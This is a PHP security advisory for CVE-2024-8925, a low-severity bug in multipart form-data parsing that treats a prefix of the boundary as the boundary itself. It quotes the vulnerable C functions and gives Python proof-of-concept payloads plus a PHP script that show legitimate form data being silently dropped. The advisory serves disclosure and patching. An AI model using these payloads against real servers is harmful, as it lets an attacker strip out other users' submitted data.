Skip to content

Erroneous parsing of multipart form data

Low
bukka published GHSA-9pqp-7h25-4f32 Sep 27, 2024

Package

No package listed

Affected versions

< 8.1.30
< 8.2.24
< 8.3.12

Patched versions

8.1.30
8.2.24
8.3.12

Description

Summary

Erroneous parsing of multipart form data contained in an HTTP POST request could lead to legitimate data not being processed thus, violating data integrity.

Details

A bug was discovered in the parsing of multipart form data contents, affecting both file and input form data. If a multipart form data payload contains a valid prefix X of the defined boundary B such that 5Kib < |X| < |B| < 8Kib, the logic responsible for parsing and storing the multipart payload fails to correctly extract the contents between two boundaries. This results in a violation of data integrity. The issue lies in the partial match handling in the following function:

// main/rfc1867.c:556
/*
 * Search for a string in a fixed-length byte string.
 * If partial is true, partial matches are allowed at the end of the buffer.
 * Returns NULL if not found, or a pointer to the start of the first match.
 */
static void *php_ap_memstr(char *haystack, int haystacklen, char *needle, int needlen, int partial)
{
	int len = haystacklen;
	char *ptr = haystack; 
	/* iterate through first character matches */
	while( (ptr = memchr(ptr, needle[0], len)) ) {
		/* calculate length after match */
		len = haystacklen - (ptr - (char *)haystack); // 
		if (memcmp(needle, ptr, needlen < len ? needlen : len) == 0 && (partial || len >= needlen)) { // partial match here if partial != 0
			break;
		}
		/* next character */
		ptr++; len--;
	}
	return ptr;
}

This is called by the following functions when the contents between two boundaries have to be extracted after parsing the MIME headers:

// main/rfc1867.c:580
static size_t multipart_buffer_read(multipart_buffer *self, char *buf, size_t bytes, int *end)
{
	size_t len, max;
	char *bound;
	
	/* fill buffer if needed */
	if (bytes > (size_t)self->bytes_in_buffer) {
		fill_buffer(self);
	}
	int i=0;
	while (self->buf_begin[i] && self->buf_begin[i] != '\r' ) i++;
	
	/* look for a potential boundary match, only read data up to that point */
	if ((bound = php_ap_memstr(self->buf_begin, self->bytes_in_buffer, self->boundary_next, self->boundary_next_len, 1))) { // partial match on
		max = bound - self->buf_begin;
		if (end && php_ap_memstr(self->buf_begin, self->bytes_in_buffer, self->boundary_next, self->boundary_next_len, 0)) {
			*end = 1;
		}
	} else {
		max = self->bytes_in_buffer;
	}
	/* maximum number of bytes we are reading */
	len = max < bytes-1 ? max : bytes-1;
	
	/* if we read any data... */
	if (len > 0) {
		/* copy the data */
		memcpy(buf, self->buf_begin, len);
		buf[len] = 0;
		if (bound && len > 0 && buf[len-1] == '\r') {
			buf[--len] = 0;
		}
		
		/* update the buffer */
		self->bytes_in_buffer -= (int)len;
		self->buf_begin += len;
	}
	return len;
}
/*
  XXX: this is horrible memory-usage-wise, but we only expect
  to do this on small pieces of form data.
*/
static char *multipart_buffer_read_body(multipart_buffer *self, size_t *len)
{
	char buf[FILLUNIT], *out=NULL; // FILLUNIT = 5*1024
	size_t total_bytes=0, read_bytes=0;
	while((read_bytes = multipart_buffer_read(self, buf, sizeof(buf), NULL))) {
		out = erealloc(out, total_bytes + read_bytes + 1);
		memcpy(out + total_bytes, buf, read_bytes);
		total_bytes += read_bytes;
	}
	if (out) {
		out[total_bytes] = '\0';
	}
	*len = total_bytes;
	return out;
}

PoC

The below python payload was used in a PHP-FPM environment coupled with a Nginx server. No particular configuration was used to couple the services. Two payloads triggering the bug are presented below:

# payload 1 - the string "\r\n--e932" is not included in the constructed data structure later 
# on submitted to a PHP script
boundary = "e932eddb2559cca708c5cb806f24abfb
content_type = f"multipart/form-data; boundary={boundary}"
msg2 =  f'--{boundary}\r\nContent-Disposition: form-data; name="koko"\r\n\r\n' \
+ 'A'*(5068+44) + f'\r\n--e932\n--{boundary}--' 
# payload 1 - the payload "\r\n--{boundary[:len(boundary)-5]}' + 'C'*100 " is again not included 
# in the constructed data structure later on submitted to a PHP script

boundary = 'A'*(6*1024)
content_type = f"multipart/form-data; boundary={boundary}"
body = f'--{boundary}\r\n' + 'Content-Disposition: form-data; name="koko"\r\n\r\n' \
+ f'BBB\r\n--{boundary[:len(boundary)-5]}' + 'C'*100 + f"\r\n--{boundary}--"

The above payloads illustrate that a prefix of the boundary is considered as a valid boundary and the processing of what is after this prefix stops.

The PHP script which can be use to illustrate the bug by writing the contents of the form into a file is the following:

$name = $_POST['koko']; 
$file_path = '/tmp/parsing-bug.txt';
$file = fopen($file_path, 'w');
if ($file) {
        fwrite($file, $name . PHP_EOL);        
        fclose($file);
        echo 'The name has been successfully written to the file.';
  }

To confirm that the 100 "C"s from the second payload are not included in the resulting file:

# tr -cd 'C' < /tmp/parsing-bug.txt | wc -c
0

Impact

The parsing bug violates data integrity. In the context where an attacker is capable of inserting a maliciously crafted payload at a desired location alongside other legitimate user payloads and is under control of other request parts such as the boundary, they can exclude portions of the legitimate data.

Severity

Low

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
High
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
Low
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N

CVE ID

CVE-2024-8925

Weaknesses

Credits